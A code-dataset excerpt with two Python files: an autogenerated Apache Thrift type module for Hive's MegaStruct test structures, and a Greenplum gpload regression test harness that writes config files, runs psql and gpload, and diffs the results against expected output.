max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
serde/src/gen/thrift/gen-py/megastruct/ttypes.py | amCharlie/hive | 2 | 1100 | <filename>serde/src/gen/thrift/gen-py/megastruct/ttypes.py
#
# Autogenerated by Thrift Compiler (0.13.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
from thrift.transport import TTransport
all_structs = []
class MyEnum(object):
LLAMA = 1
ALPACA = 2
_VALUES_TO_NAMES = {
1: "LLAMA",
2: "ALPACA",
}
_NAMES_TO_VALUES = {
"LLAMA": 1,
"ALPACA": 2,
}
class MiniStruct(object):
"""
Attributes:
- my_string
- my_enum
"""
def __init__(self, my_string=None, my_enum=None,):
self.my_string = my_string
self.my_enum = my_enum
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.my_string = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.my_enum = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('MiniStruct')
if self.my_string is not None:
oprot.writeFieldBegin('my_string', TType.STRING, 1)
oprot.writeString(self.my_string.encode('utf-8') if sys.version_info[0] == 2 else self.my_string)
oprot.writeFieldEnd()
if self.my_enum is not None:
oprot.writeFieldBegin('my_enum', TType.I32, 2)
oprot.writeI32(self.my_enum)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class MegaStruct(object):
"""
Attributes:
- my_bool
- my_byte
- my_16bit_int
- my_32bit_int
- my_64bit_int
- my_double
- my_string
- my_binary
- my_string_string_map
- my_string_enum_map
- my_enum_string_map
- my_enum_struct_map
- my_enum_stringlist_map
- my_enum_structlist_map
- my_stringlist
- my_structlist
- my_enumlist
- my_stringset
- my_enumset
- my_structset
"""
def __init__(self, my_bool=None, my_byte=None, my_16bit_int=None, my_32bit_int=None, my_64bit_int=None, my_double=None, my_string=None, my_binary=None, my_string_string_map=None, my_string_enum_map=None, my_enum_string_map=None, my_enum_struct_map=None, my_enum_stringlist_map=None, my_enum_structlist_map=None, my_stringlist=None, my_structlist=None, my_enumlist=None, my_stringset=None, my_enumset=None, my_structset=None,):
self.my_bool = my_bool
self.my_byte = my_byte
self.my_16bit_int = my_16bit_int
self.my_32bit_int = my_32bit_int
self.my_64bit_int = my_64bit_int
self.my_double = my_double
self.my_string = my_string
self.my_binary = my_binary
self.my_string_string_map = my_string_string_map
self.my_string_enum_map = my_string_enum_map
self.my_enum_string_map = my_enum_string_map
self.my_enum_struct_map = my_enum_struct_map
self.my_enum_stringlist_map = my_enum_stringlist_map
self.my_enum_structlist_map = my_enum_structlist_map
self.my_stringlist = my_stringlist
self.my_structlist = my_structlist
self.my_enumlist = my_enumlist
self.my_stringset = my_stringset
self.my_enumset = my_enumset
self.my_structset = my_structset
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BOOL:
self.my_bool = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.BYTE:
self.my_byte = iprot.readByte()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I16:
self.my_16bit_int = iprot.readI16()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I32:
self.my_32bit_int = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I64:
self.my_64bit_int = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.DOUBLE:
self.my_double = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.STRING:
self.my_string = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.STRING:
self.my_binary = iprot.readBinary()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.MAP:
self.my_string_string_map = {}
(_ktype1, _vtype2, _size0) = iprot.readMapBegin()
for _i4 in range(_size0):
_key5 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val6 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.my_string_string_map[_key5] = _val6
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.MAP:
self.my_string_enum_map = {}
(_ktype8, _vtype9, _size7) = iprot.readMapBegin()
for _i11 in range(_size7):
_key12 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val13 = iprot.readI32()
self.my_string_enum_map[_key12] = _val13
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.MAP:
self.my_enum_string_map = {}
(_ktype15, _vtype16, _size14) = iprot.readMapBegin()
for _i18 in range(_size14):
_key19 = iprot.readI32()
_val20 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.my_enum_string_map[_key19] = _val20
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.MAP:
self.my_enum_struct_map = {}
(_ktype22, _vtype23, _size21) = iprot.readMapBegin()
for _i25 in range(_size21):
_key26 = iprot.readI32()
_val27 = MiniStruct()
_val27.read(iprot)
self.my_enum_struct_map[_key26] = _val27
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.MAP:
self.my_enum_stringlist_map = {}
(_ktype29, _vtype30, _size28) = iprot.readMapBegin()
for _i32 in range(_size28):
_key33 = iprot.readI32()
_val34 = []
(_etype38, _size35) = iprot.readListBegin()
for _i39 in range(_size35):
_elem40 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val34.append(_elem40)
iprot.readListEnd()
self.my_enum_stringlist_map[_key33] = _val34
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.MAP:
self.my_enum_structlist_map = {}
(_ktype42, _vtype43, _size41) = iprot.readMapBegin()
for _i45 in range(_size41):
_key46 = iprot.readI32()
_val47 = []
(_etype51, _size48) = iprot.readListBegin()
for _i52 in range(_size48):
_elem53 = MiniStruct()
_elem53.read(iprot)
_val47.append(_elem53)
iprot.readListEnd()
self.my_enum_structlist_map[_key46] = _val47
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.LIST:
self.my_stringlist = []
(_etype57, _size54) = iprot.readListBegin()
for _i58 in range(_size54):
_elem59 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.my_stringlist.append(_elem59)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.LIST:
self.my_structlist = []
(_etype63, _size60) = iprot.readListBegin()
for _i64 in range(_size60):
_elem65 = MiniStruct()
_elem65.read(iprot)
self.my_structlist.append(_elem65)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.LIST:
self.my_enumlist = []
(_etype69, _size66) = iprot.readListBegin()
for _i70 in range(_size66):
_elem71 = iprot.readI32()
self.my_enumlist.append(_elem71)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.SET:
self.my_stringset = set()
(_etype75, _size72) = iprot.readSetBegin()
for _i76 in range(_size72):
_elem77 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.my_stringset.add(_elem77)
iprot.readSetEnd()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.SET:
self.my_enumset = set()
(_etype81, _size78) = iprot.readSetBegin()
for _i82 in range(_size78):
_elem83 = iprot.readI32()
self.my_enumset.add(_elem83)
iprot.readSetEnd()
else:
iprot.skip(ftype)
elif fid == 20:
if ftype == TType.SET:
self.my_structset = set()
(_etype87, _size84) = iprot.readSetBegin()
for _i88 in range(_size84):
_elem89 = MiniStruct()
_elem89.read(iprot)
self.my_structset.add(_elem89)
iprot.readSetEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('MegaStruct')
if self.my_bool is not None:
oprot.writeFieldBegin('my_bool', TType.BOOL, 1)
oprot.writeBool(self.my_bool)
oprot.writeFieldEnd()
if self.my_byte is not None:
oprot.writeFieldBegin('my_byte', TType.BYTE, 2)
oprot.writeByte(self.my_byte)
oprot.writeFieldEnd()
if self.my_16bit_int is not None:
oprot.writeFieldBegin('my_16bit_int', TType.I16, 3)
oprot.writeI16(self.my_16bit_int)
oprot.writeFieldEnd()
if self.my_32bit_int is not None:
oprot.writeFieldBegin('my_32bit_int', TType.I32, 4)
oprot.writeI32(self.my_32bit_int)
oprot.writeFieldEnd()
if self.my_64bit_int is not None:
oprot.writeFieldBegin('my_64bit_int', TType.I64, 5)
oprot.writeI64(self.my_64bit_int)
oprot.writeFieldEnd()
if self.my_double is not None:
oprot.writeFieldBegin('my_double', TType.DOUBLE, 6)
oprot.writeDouble(self.my_double)
oprot.writeFieldEnd()
if self.my_string is not None:
oprot.writeFieldBegin('my_string', TType.STRING, 7)
oprot.writeString(self.my_string.encode('utf-8') if sys.version_info[0] == 2 else self.my_string)
oprot.writeFieldEnd()
if self.my_binary is not None:
oprot.writeFieldBegin('my_binary', TType.STRING, 8)
oprot.writeBinary(self.my_binary)
oprot.writeFieldEnd()
if self.my_string_string_map is not None:
oprot.writeFieldBegin('my_string_string_map', TType.MAP, 9)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.my_string_string_map))
for kiter90, viter91 in self.my_string_string_map.items():
oprot.writeString(kiter90.encode('utf-8') if sys.version_info[0] == 2 else kiter90)
oprot.writeString(viter91.encode('utf-8') if sys.version_info[0] == 2 else viter91)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.my_string_enum_map is not None:
oprot.writeFieldBegin('my_string_enum_map', TType.MAP, 10)
oprot.writeMapBegin(TType.STRING, TType.I32, len(self.my_string_enum_map))
for kiter92, viter93 in self.my_string_enum_map.items():
oprot.writeString(kiter92.encode('utf-8') if sys.version_info[0] == 2 else kiter92)
oprot.writeI32(viter93)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.my_enum_string_map is not None:
oprot.writeFieldBegin('my_enum_string_map', TType.MAP, 11)
oprot.writeMapBegin(TType.I32, TType.STRING, len(self.my_enum_string_map))
for kiter94, viter95 in self.my_enum_string_map.items():
oprot.writeI32(kiter94)
oprot.writeString(viter95.encode('utf-8') if sys.version_info[0] == 2 else viter95)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.my_enum_struct_map is not None:
oprot.writeFieldBegin('my_enum_struct_map', TType.MAP, 12)
oprot.writeMapBegin(TType.I32, TType.STRUCT, len(self.my_enum_struct_map))
for kiter96, viter97 in self.my_enum_struct_map.items():
oprot.writeI32(kiter96)
viter97.write(oprot)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.my_enum_stringlist_map is not None:
oprot.writeFieldBegin('my_enum_stringlist_map', TType.MAP, 13)
oprot.writeMapBegin(TType.I32, TType.LIST, len(self.my_enum_stringlist_map))
for kiter98, viter99 in self.my_enum_stringlist_map.items():
oprot.writeI32(kiter98)
oprot.writeListBegin(TType.STRING, len(viter99))
for iter100 in viter99:
oprot.writeString(iter100.encode('utf-8') if sys.version_info[0] == 2 else iter100)
oprot.writeListEnd()
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.my_enum_structlist_map is not None:
oprot.writeFieldBegin('my_enum_structlist_map', TType.MAP, 14)
oprot.writeMapBegin(TType.I32, TType.LIST, len(self.my_enum_structlist_map))
for kiter101, viter102 in self.my_enum_structlist_map.items():
oprot.writeI32(kiter101)
oprot.writeListBegin(TType.STRUCT, len(viter102))
for iter103 in viter102:
iter103.write(oprot)
oprot.writeListEnd()
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.my_stringlist is not None:
oprot.writeFieldBegin('my_stringlist', TType.LIST, 15)
oprot.writeListBegin(TType.STRING, len(self.my_stringlist))
for iter104 in self.my_stringlist:
oprot.writeString(iter104.encode('utf-8') if sys.version_info[0] == 2 else iter104)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.my_structlist is not None:
oprot.writeFieldBegin('my_structlist', TType.LIST, 16)
oprot.writeListBegin(TType.STRUCT, len(self.my_structlist))
for iter105 in self.my_structlist:
iter105.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.my_enumlist is not None:
oprot.writeFieldBegin('my_enumlist', TType.LIST, 17)
oprot.writeListBegin(TType.I32, len(self.my_enumlist))
for iter106 in self.my_enumlist:
oprot.writeI32(iter106)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.my_stringset is not None:
oprot.writeFieldBegin('my_stringset', TType.SET, 18)
oprot.writeSetBegin(TType.STRING, len(self.my_stringset))
for iter107 in self.my_stringset:
oprot.writeString(iter107.encode('utf-8') if sys.version_info[0] == 2 else iter107)
oprot.writeSetEnd()
oprot.writeFieldEnd()
if self.my_enumset is not None:
oprot.writeFieldBegin('my_enumset', TType.SET, 19)
oprot.writeSetBegin(TType.I32, len(self.my_enumset))
for iter108 in self.my_enumset:
oprot.writeI32(iter108)
oprot.writeSetEnd()
oprot.writeFieldEnd()
if self.my_structset is not None:
oprot.writeFieldBegin('my_structset', TType.SET, 20)
oprot.writeSetBegin(TType.STRUCT, len(self.my_structset))
for iter109 in self.my_structset:
iter109.write(oprot)
oprot.writeSetEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(MiniStruct)
MiniStruct.thrift_spec = (
None, # 0
(1, TType.STRING, 'my_string', 'UTF8', None, ), # 1
(2, TType.I32, 'my_enum', None, None, ), # 2
)
all_structs.append(MegaStruct)
MegaStruct.thrift_spec = (
None, # 0
(1, TType.BOOL, 'my_bool', None, None, ), # 1
(2, TType.BYTE, 'my_byte', None, None, ), # 2
(3, TType.I16, 'my_16bit_int', None, None, ), # 3
(4, TType.I32, 'my_32bit_int', None, None, ), # 4
(5, TType.I64, 'my_64bit_int', None, None, ), # 5
(6, TType.DOUBLE, 'my_double', None, None, ), # 6
(7, TType.STRING, 'my_string', 'UTF8', None, ), # 7
(8, TType.STRING, 'my_binary', 'BINARY', None, ), # 8
(9, TType.MAP, 'my_string_string_map', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 9
(10, TType.MAP, 'my_string_enum_map', (TType.STRING, 'UTF8', TType.I32, None, False), None, ), # 10
(11, TType.MAP, 'my_enum_string_map', (TType.I32, None, TType.STRING, 'UTF8', False), None, ), # 11
(12, TType.MAP, 'my_enum_struct_map', (TType.I32, None, TType.STRUCT, [MiniStruct, None], False), None, ), # 12
(13, TType.MAP, 'my_enum_stringlist_map', (TType.I32, None, TType.LIST, (TType.STRING, 'UTF8', False), False), None, ), # 13
(14, TType.MAP, 'my_enum_structlist_map', (TType.I32, None, TType.LIST, (TType.STRUCT, [MiniStruct, None], False), False), None, ), # 14
(15, TType.LIST, 'my_stringlist', (TType.STRING, 'UTF8', False), None, ), # 15
(16, TType.LIST, 'my_structlist', (TType.STRUCT, [MiniStruct, None], False), None, ), # 16
(17, TType.LIST, 'my_enumlist', (TType.I32, None, False), None, ), # 17
(18, TType.SET, 'my_stringset', (TType.STRING, 'UTF8', False), None, ), # 18
(19, TType.SET, 'my_enumset', (TType.I32, None, False), None, ), # 19
(20, TType.SET, 'my_structset', (TType.STRUCT, [MiniStruct, None], False), None, ), # 20
)
fix_spec(all_structs)
del all_structs
| 1.992188 | 2 |
gpMgmt/bin/gpload_test/gpload2/TEST.py | Tylarb/gpdb | 1 | 1101 | <gh_stars>1-10
#!/usr/bin/env python
import unittest
import sys
import os
import string
import time
import socket
import fileinput
import platform
import re
try:
import subprocess32 as subprocess
except:
import subprocess
import pg
def get_port_from_conf():
file = os.environ.get('MASTER_DATA_DIRECTORY')+'/postgresql.conf'
if os.path.isfile(file):
with open(file) as f:
for line in f.xreadlines():
match = re.search('port=\d+',line)
if match:
match1 = re.search('\d+', match.group())
if match1:
return match1.group()
def get_port():
port = os.environ['PGPORT']
if not port:
port = get_port_from_conf()
return port if port else 5432
def get_ip(hostname=None):
if hostname is None:
hostname = socket.gethostname()
else:
hostname = hostname
hostinfo = socket.getaddrinfo(hostname, None)
ipaddrlist = list(set([(ai[4][0]) for ai in hostinfo]))
for myip in ipaddrlist:
if myip.find(":") > 0:
ipv6 = myip
return ipv6
elif myip.find(".") > 0:
ipv4 = myip
return ipv4
def getPortMasterOnly(host = 'localhost',master_value = None,
user = os.environ.get('USER'),gphome = os.environ['GPHOME'],
mdd=os.environ['MASTER_DATA_DIRECTORY'],port = os.environ['PGPORT']):
master_pattern = "Context:\s*-1\s*Value:\s*\d+"
command = "gpconfig -s %s" % ( "port" )
cmd = "source %s/greenplum_path.sh; export MASTER_DATA_DIRECTORY=%s; export PGPORT=%s; %s" \
% (gphome, mdd, port, command)
(ok,out) = run(cmd)
if not ok:
raise Exception("Unable to connect to segment server %s as user %s" % (host, user))
for line in out:
out = line.split('\n')
for line in out:
if re.search(master_pattern, line):
master_value = int(line.split()[3].strip())
if master_value is None:
error_msg = "".join(out)
raise Exception(error_msg)
return str(master_value)
"""
Global Values
"""
MYD = os.path.abspath(os.path.dirname(__file__))
mkpath = lambda *x: os.path.join(MYD, *x)
UPD = os.path.abspath(mkpath('..'))
if UPD not in sys.path:
sys.path.append(UPD)
DBNAME = "postgres"
USER = os.environ.get( "LOGNAME" )
HOST = socket.gethostname()
GPHOME = os.getenv("GPHOME")
PGPORT = get_port()
PGUSER = os.environ.get("PGUSER")
if PGUSER is None:
PGUSER = USER
PGHOST = os.environ.get("PGHOST")
if PGHOST is None:
PGHOST = HOST
d = mkpath('config')
if not os.path.exists(d):
os.mkdir(d)
def write_config_file(mode='insert', reuse_flag='',columns_flag='0',mapping='0',portNum='8081',database='reuse_gptest',host='localhost',formatOpts='text',file='data/external_file_01.txt',table='texttable',format='text',delimiter="'|'",escape='',quote='',truncate='False',log_errors=None, error_limit='0',error_table=None,externalSchema=None,staging_table=None,fast_match='false', encoding=None, preload=True, fill=False):
f = open(mkpath('config/config_file'),'w')
f.write("VERSION: 1.0.0.1")
if database:
f.write("\nDATABASE: "+database)
f.write("\nUSER: "+os.environ.get('USER'))
f.write("\nHOST: "+hostNameAddrs)
f.write("\nPORT: "+masterPort)
f.write("\nGPLOAD:")
f.write("\n INPUT:")
f.write("\n - SOURCE:")
f.write("\n LOCAL_HOSTNAME:")
f.write("\n - "+hostNameAddrs)
if portNum:
f.write("\n PORT: "+portNum)
f.write("\n FILE:")
f.write("\n - "+mkpath(file))
if columns_flag=='1':
f.write("\n - COLUMNS:")
f.write("\n - s_s1: text")
f.write("\n - s_s2: text")
f.write("\n - s_dt: timestamp")
f.write("\n - s_s3: text")
f.write("\n - s_n1: smallint")
f.write("\n - s_n2: integer")
f.write("\n - s_n3: bigint")
f.write("\n - s_n4: decimal")
f.write("\n - s_n5: numeric")
f.write("\n - s_n6: real")
f.write("\n - s_n7: double precision")
f.write("\n - s_n8: text")
f.write("\n - s_n9: text")
if format:
f.write("\n - FORMAT: "+format)
if log_errors:
f.write("\n - LOG_ERRORS: true")
f.write("\n - ERROR_LIMIT: " + error_limit)
if error_table:
f.write("\n - ERROR_TABLE: " + error_table)
f.write("\n - ERROR_LIMIT: " + error_limit)
if delimiter:
f.write("\n - DELIMITER: "+delimiter)
if encoding:
f.write("\n - ENCODING: "+encoding)
if escape:
f.write("\n - ESCAPE: "+escape)
if quote:
f.write("\n - QUOTE: "+quote)
if fill:
f.write("\n - FILL_MISSING_FIELDS: true")
f.write("\n OUTPUT:")
f.write("\n - TABLE: "+table)
if mode:
if mode == 'insert':
f.write("\n - MODE: "+'insert')
if mode == 'update':
f.write("\n - MODE: "+'update')
if mode == 'merge':
f.write("\n - MODE: "+'merge')
f.write("\n - UPDATE_COLUMNS:")
f.write("\n - n2")
f.write("\n - MATCH_COLUMNS:")
f.write("\n - n1")
f.write("\n - s1")
f.write("\n - s2")
if mapping=='1':
f.write("\n - MAPPING:")
f.write("\n s1: s_s1")
f.write("\n s2: s_s2")
f.write("\n dt: s_dt")
f.write("\n s3: s_s3")
f.write("\n n1: s_n1")
f.write("\n n2: s_n2")
f.write("\n n3: s_n3")
f.write("\n n4: s_n4")
f.write("\n n5: s_n5")
f.write("\n n6: s_n6")
f.write("\n n7: s_n7")
f.write("\n n8: s_n8")
f.write("\n n9: s_n9")
if externalSchema:
f.write("\n EXTERNAL:")
f.write("\n - SCHEMA: "+externalSchema)
if preload:
f.write("\n PRELOAD:")
f.write("\n - REUSE_TABLES: "+reuse_flag)
f.write("\n - FAST_MATCH: "+fast_match)
if staging_table:
f.write("\n - STAGING_TABLE: "+staging_table)
f.write("\n")
f.close()
def runfile(ifile, flag='', dbname=None, outputPath="", outputFile="",
username=None,
PGOPTIONS=None, host = None, port = None):
if len(outputFile) == 0:
(ok, out) = psql_run(ifile = ifile,ofile = outFile(ifile, outputPath),flag = flag,
dbname=dbname , username=username,
PGOPTIONS=PGOPTIONS, host = host, port = port)
else:
(ok,out) = psql_run(ifile =ifile, ofile =outFile(outputFile, outputPath), flag =flag,
dbname= dbname, username= username,
PGOPTIONS= PGOPTIONS, host = host, port = port)
return (ok, out)
def psql_run(ifile = None, ofile = None, cmd = None,
flag = '-e',dbname = None,
username = None,
PGOPTIONS = None, host = None, port = None):
'''
Run a command or file against psql. Return True if OK.
@param dbname: database name
@param ifile: input file
@param cmd: command line
@param flag: -e Run SQL with no comments (default)
-a Run SQL with comments and psql notice
@param username: psql user
@param host : to connect to a different host
@param port : port where gpdb is running
@param PGOPTIONS: connects to postgres via utility mode
'''
if dbname is None:
dbname = DBNAME
if username is None:
username = PGUSER # Use the default login user
if PGOPTIONS is None:
PGOPTIONS = ""
else:
PGOPTIONS = "PGOPTIONS='%s'" % PGOPTIONS
if host is None:
host = "-h %s" % PGHOST
else:
host = "-h %s" % host
if port is None:
port = ""
else:
port = "-p %s" % port
if cmd:
arg = '-c "%s"' % cmd
elif ifile:
arg = ' < ' + ifile
if not (flag == '-q'): # Don't echo commands sent to server
arg = '-e < ' + ifile
if flag == '-a':
arg = '-f ' + ifile
else:
raise PSQLError('missing cmd and ifile')
if ofile == '-':
ofile = '2>&1'
elif not ofile:
ofile = '> /dev/null 2>&1'
else:
ofile = '> %s 2>&1' % ofile
return run('%s psql -d %s %s %s -U %s %s %s %s' %
(PGOPTIONS, dbname, host, port, username, flag, arg, ofile))
def run(cmd):
"""
Run a shell command. Return (True, [result]) if OK, or (False, []) otherwise.
@params cmd: The command to run at the shell.
oFile: an optional output file.
mode: What to do if the output file already exists: 'a' = append;
'w' = write. Defaults to append (so that the function is
backwards compatible). Yes, this is passed to the open()
function, so you can theoretically pass any value that is
valid for the second parameter of open().
"""
p = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out = p.communicate()[0]
ret = []
ret.append(out)
rc = False if p.wait() else True
return (rc,ret)
def outFile(fname,outputPath = ''):
return changeExtFile(fname, ".out", outputPath)
def diffFile( fname, outputPath = "" ):
return changeExtFile( fname, ".diff", outputPath )
def changeExtFile( fname, ext = ".diff", outputPath = "" ):
if len( outputPath ) == 0:
return os.path.splitext( fname )[0] + ext
else:
filename = fname.split( "/" )
fname = os.path.splitext( filename[len( filename ) - 1] )[0]
return outputPath + "/" + fname + ext
def gpdbAnsFile(fname):
ext = '.ans'
return os.path.splitext(fname)[0] + ext
def isFileEqual( f1, f2, optionalFlags = "", outputPath = "", myinitfile = ""):
LMYD = os.path.abspath(os.path.dirname(__file__))
if not os.access( f1, os.R_OK ):
raise Exception( 'Error: cannot find file %s' % f1 )
if not os.access( f2, os.R_OK ):
raise Exception( 'Error: cannot find file %s' % f2 )
dfile = diffFile( f1, outputPath = outputPath )
# Gets the suitePath name to add init_file
suitePath = f1[0:f1.rindex( "/" )]
if os.path.exists(suitePath + "/init_file"):
(ok, out) = run('../gpdiff.pl -w ' + optionalFlags + \
' -I NOTICE: -I HINT: -I CONTEXT: -I GP_IGNORE: --gp_init_file=%s/global_init_file --gp_init_file=%s/init_file '
'%s %s > %s 2>&1' % (LMYD, suitePath, f1, f2, dfile))
else:
if os.path.exists(myinitfile):
(ok, out) = run('../gpdiff.pl -w ' + optionalFlags + \
' -I NOTICE: -I HINT: -I CONTEXT: -I GP_IGNORE: --gp_init_file=%s/global_init_file --gp_init_file=%s '
'%s %s > %s 2>&1' % (LMYD, myinitfile, f1, f2, dfile))
else:
(ok, out) = run( '../gpdiff.pl -w ' + optionalFlags + \
' -I NOTICE: -I HINT: -I CONTEXT: -I GP_IGNORE: --gp_init_file=%s/global_init_file '
'%s %s > %s 2>&1' % ( LMYD, f1, f2, dfile ) )
if ok:
os.unlink( dfile )
return ok
def read_diff(ifile, outputPath):
"""
Opens the diff file that is assocated with the given input file and returns
its contents as a string.
"""
dfile = diffFile(ifile, outputPath)
with open(dfile, 'r') as diff:
return diff.read()
def modify_sql_file(num):
file = mkpath('query%d.sql' % num)
user = os.environ.get('USER')
if not user:
user = os.environ.get('USER')
if os.path.isfile(file):
for line in fileinput.FileInput(file,inplace=1):
line = line.replace("gpload.py ","gpload ")
print str(re.sub('\n','',line))
def copy_data(source='',target=''):
cmd = 'cp '+ mkpath('data/' + source) + ' ' + mkpath(target)
p = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
return p.communicate()
hostNameAddrs = get_ip(HOST)
masterPort = getPortMasterOnly()
def get_table_name():
try:
db = pg.DB(dbname='reuse_gptest'
,host='localhost'
,port=int(PGPORT)
)
except Exception,e:
errorMessage = str(e)
print 'could not connect to database: ' + errorMessage
queryString = """SELECT relname
from pg_class
WHERE relname
like 'ext_gpload_reusable%'
OR relname
like 'staging_gpload_reusable%';"""
resultList = db.query(queryString.encode('utf-8')).getresult()
return resultList
def drop_tables():
try:
db = pg.DB(dbname='reuse_gptest'
,host='localhost'
,port=int(PGPORT)
)
except Exception,e:
errorMessage = str(e)
print 'could not connect to database: ' + errorMessage
list = get_table_name()
for i in list:
name = i[0]
match = re.search('ext_gpload',name)
if match:
queryString = "DROP EXTERNAL TABLE %s" % name
db.query(queryString.encode('utf-8'))
else:
queryString = "DROP TABLE %s" % name
db.query(queryString.encode('utf-8'))
class PSQLError(Exception):
'''
PSQLError is the base class for exceptions in this module
http://docs.python.org/tutorial/errors.html
We want to raise an error and not a failure. The reason for an error
might be program error, file not found, etc.
Failure is define as test case failures, when the output is different
from the expected result.
'''
pass
class GPLoad_FormatOpts_TestCase(unittest.TestCase):
def check_result(self,ifile, optionalFlags = "-U3", outputPath = ""):
"""
PURPOSE: compare the actual and expected output files and report an
error if they don't match.
PARAMETERS:
ifile: the name of the .sql file whose actual and expected outputs
we want to compare. You may include the path as well as the
filename. This function will process this file name to
figure out the proper names of the .out and .ans files.
optionalFlags: command-line options (if any) for diff.
For example, pass " -B " (with the blank spaces) to ignore
blank lines. By default, diffs are unified with 3 lines of
context (i.e. optionalFlags is "-U3").
"""
f1 = gpdbAnsFile(ifile)
f2 = outFile(ifile, outputPath=outputPath)
result = isFileEqual(f1, f2, optionalFlags, outputPath=outputPath)
diff = None if result else read_diff(ifile, outputPath)
self.assertTrue(result, "query resulted in diff:\n{}".format(diff))
return True
def doTest(self, num):
file = mkpath('query%d.diff' % num)
if os.path.isfile(file):
run("rm -f" + " " + file)
modify_sql_file(num)
file = mkpath('query%d.sql' % num)
runfile(file)
self.check_result(file)
def test_00_gpload_formatOpts_setup(self):
"0 gpload setup"
for num in range(1,40):
f = open(mkpath('query%d.sql' % num),'w')
f.write("\! gpload -f "+mkpath('config/config_file')+ " -d reuse_gptest\n"+"\! gpload -f "+mkpath('config/config_file')+ " -d reuse_gptest\n")
f.close()
file = mkpath('setup.sql')
runfile(file)
self.check_result(file)
